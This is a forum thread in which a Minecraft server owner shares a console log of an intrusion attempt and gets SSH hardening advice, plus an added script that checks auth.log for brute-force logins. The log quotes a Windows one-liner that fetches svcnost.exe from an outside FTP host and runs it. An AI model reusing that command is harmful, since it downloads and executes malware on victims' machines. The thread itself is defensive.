Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private Linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my Minecraft command prompt logs:
>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.
Now, I'm quite new at Linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions:
1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside Minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?
I've closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.
If anyone needs more info from me, I will be happy to provide.
Cheers guys, and oh! First Post!
- Neko22
The good: That was a Windows attack... so it wouldn't have an effect on your Linux box. (but the FTP command will work even if you don't have an FTP server running, it's just a transfer protocol. So IF it worked, the files would have still gotten through)
However, I would suggest you take a look at your logs.
Where did you see that? When you opened your console, or in server.log?
If it's in the console, you need to take some steps to protect yourself.
0) DON'T use the root account to run Minecraft.
1) For ****'s sake... DISABLE ROOT LOGIN for SSH if not already done. If you really need root, you can use 'su' from your user account.
2) Disable all non-used user accounts, and create very secure passwords for the ones that remain open, lest you find them broken into using a standard brute force attack.
3) You can keep SSH, but I highly recommend changing the port to something other than any commonly used port... 14242, or some ****. Just be sure you are using the '-p <port>' flag when sshing into your box from a term. This will help deter automated scripts that get a hold of your IP from running brute force attacks on your server.
4) Verify if you are being attacked by looking at your logs... In Debian and like flavors, you can find them in /var/log/
You can do a few things here... actively tail your auth.log file via 'tail -f auth.log' or you can throw the last few thousand lines into another file so you can take a gander: 'tail -n 2500 auth.log >> ~/access_log.txt'
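The checks from the reply above as a script, added here as an example and not part of the original posts: it reads the effective PermitRootLogin and Port from an sshd_config, counts failed password attempts per IP in auth.log, and lists accepted logins that follow a run of failures from the same address. The sample files, host name, user and IPs are constructed, the function names are illustrative, and the parser assumes the usual OpenSSH "Failed/Accepted password for USER from IP port N" line format.

```shell
# Added example; every file, host, user and IP below is constructed.
# On a Debian-like box use /etc/ssh/sshd_config and /var/log/auth.log.

# Effective value of a global sshd_config keyword: sshd keeps the FIRST
# occurrence, keywords are case-insensitive. Assumption: no Include files.
sshd_setting() {  # usage: sshd_setting FILE KEYWORD DEFAULT
    awk -v key="$2" -v def="$3" '
        /^[ \t]*#/ { next }
        tolower($1) == "match" { exit }   # conditional blocks start here
        tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print def }' "$1"
}

# Failed SSH password attempts per source IP, busiest first.
failed_by_ip() {  # usage: failed_by_ip AUTH_LOG
    awk '/sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i < NF - 1; i++)
                if ($i == "from" && $(i + 2) == "port") n[$(i + 1)]++
         }
         END { for (ip in n) print n[ip], ip }' "$1" | sort -k1,1nr -k2,2
}

# "ip user failures" for each accepted password login whose source IP
# already had at least MIN failures earlier in the log.
guessed_logins() {  # usage: guessed_logins AUTH_LOG MIN
    awk -v min="$2" '
        /sshd\[[0-9]+\]: (Failed|Accepted) password/ {
            ip = ""
            for (i = 2; i < NF - 1; i++)
                if ($i == "from" && $(i + 2) == "port") { ip = $(i + 1); user = $(i - 1); break }
            if (ip == "") next
            if ($0 ~ /: Failed password/) fails[ip]++
            else if (fails[ip] >= min + 0) print ip, user, fails[ip]
        }' "$1"
}

SAMPLE=$(mktemp -d)
printf '%s\n' 'Port 14242' '#PermitRootLogin no' 'PermitRootLogin yes' 'PermitRootLogin no' > "$SAMPLE/sshd_config"
cat > "$SAMPLE/auth.log" <<'EOF'
Mar  3 17:20:01 mcbox sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 17:20:03 mcbox sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 17:20:05 mcbox sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
Mar  3 17:21:40 mcbox sshd[2110]: Failed password for mc from 198.51.100.9 port 51022 ssh2
Mar  3 17:22:10 mcbox sshd[2114]: Accepted password for mc from 203.0.113.7 port 40155 ssh2
Mar  3 17:30:00 mcbox sshd[2120]: Accepted password for mc from 198.51.100.9 port 51030 ssh2
EOF
echo "PermitRootLogin: $(sshd_setting "$SAMPLE/sshd_config" PermitRootLogin prohibit-password)"
failed_by_ip "$SAMPLE/auth.log"
guessed_logins "$SAMPLE/auth.log" 3
```

A line printed by guessed_logins means a password was accepted from an address that had just been guessing, so that account should be treated as compromised and its password changed.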
I'm not gonna lie, you make it sound like Minecraft would let someone force feed files via FTP onto Windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...
Well... that's not true... the code was probably sent via automation.... if you look at that command, you can see it uses 'cmd' which means it is probably trying to start it using the 'Run...' command of Windows... His information is limited, so we don't know how he found that info on his server. None of those commands would ever work from the Minecraft console as it's just not designed that way...
hence all of the "[INFO] Unknown console command. Type "help" for help." ****.
Given his description, that may have occurred because he just didn't secure his server correctly and someone brute forced his system to get in. THIS is why people that think they can just start up a server get so ****ed over when they start advertising their IP to the world.
You are freaking out from basic lack of knowledge in that area, just stop...
Thanks guys for your help, I've done all the things you suggested so I think I'm a little bit safer now.
I couldn't see anything in the logs per se, but I no doubt missed something. In any case I think the hole is closed now.
I think I'm going to go read up some more now...